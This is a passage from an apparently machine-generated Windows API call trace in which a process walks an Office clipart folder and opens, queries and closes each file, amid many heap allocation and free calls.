Size=0x20) returned 0x883b0 [0103.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0103.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.756] AreFileApisANSI () returned 1 [0103.756] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a368 [0103.756] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 69 [0103.756] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC2.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\classic2.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd71e4b4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd71e4b4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd71e4b4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8d6)) returned 1 [0103.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0103.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0103.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0103.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d2c0 | out: hHeap=0x20000) returned 1 [0103.756] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.756] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.756] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6f8253, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6f8253, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd71e4b4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8d6, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="CLIP.WMF", cAlternateFileName="")) returned 1 [0103.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0103.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0103.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0103.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0103.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0103.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0103.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0103.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0103.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0103.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fd18 [0103.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0103.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aeb0 [0103.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fd18 | out: hHeap=0x20000) returned 1 [0103.757] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.757] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.757] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.757] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0103.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.757] AreFileApisANSI () returned 1 [0103.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLIP.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLIP.WMF", lpUsedDefaultChar=0x0) returned 65 [0103.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0103.757] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.757] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0103.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0103.758] AreFileApisANSI () returned 1 [0103.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0103.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x82688 [0103.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x82688, cchWideChar=65 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLIP.WMF") returned 65 [0103.758] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLIP.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\clip.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.758] GetFileType (hFile=0x368) returned 0x1 [0103.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82688 | out: hHeap=0x20000) returned 1 [0103.758] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.758] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.759] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.759] CloseHandle (hObject=0x368) returned 1 [0103.759] AreFileApisANSI () returned 1 [0103.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0103.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x82dd8 [0103.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x82dd8, cchWideChar=65 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLIP.WMF") returned 65 [0103.759] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLIP.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\clip.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.759] GetFileType (hFile=0x368) returned 0x1 [0103.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82dd8 | out: hHeap=0x20000) returned 1 [0103.759] CloseHandle (hObject=0x368) returned 1 [0103.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.760] AreFileApisANSI () returned 1 [0103.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0103.760] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLIP.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\clip.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6f8253, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6f8253, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd71e4b4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8d6)) returned 1 [0103.760] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.760] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.760] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd71e4b4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd71e4b4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd71e4b4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1b3a, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="CMNTY_01.MID", cAlternateFileName="")) returned 1 [0103.760] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.760] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.760] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.760] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.760] AreFileApisANSI () returned 1 [0103.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CMNTY_01.MID", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CMNTY_01.MID", lpUsedDefaultChar=0x0) returned 69 [0103.760] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.760] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.760] AreFileApisANSI () returned 1 [0103.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.760] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CMNTY_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cmnty_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.761] GetFileType (hFile=0x368) returned 0x1 [0103.761] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.761] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.761] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.761] CloseHandle (hObject=0x368) returned 1 [0103.761] AreFileApisANSI () returned 1 [0103.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a958 [0103.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x8a958, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 69 [0103.762] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CMNTY_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cmnty_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.762] GetFileType (hFile=0x368) returned 0x1 [0103.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a958 | out: hHeap=0x20000) returned 1 [0103.762] CloseHandle (hObject=0x368) returned 1 [0103.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0103.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0103.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0103.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0103.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0103.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0103.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0103.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0103.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0103.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0103.763] AreFileApisANSI () returned 1 [0103.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ab20 [0103.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x8ab20, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 69 [0103.763] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CMNTY_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cmnty_01.mid"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd71e4b4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd71e4b4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd71e4b4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1b3a)) returned 1 [0103.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0103.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0103.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0103.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0103.764] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.764] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.764] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd71e4b4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd71e4b4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd71e4b4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1496, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="CRANE.WMF", cAlternateFileName="")) returned 1 [0103.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0103.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35250 [0103.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0103.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35250 | out: hHeap=0x20000) returned 1 [0103.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 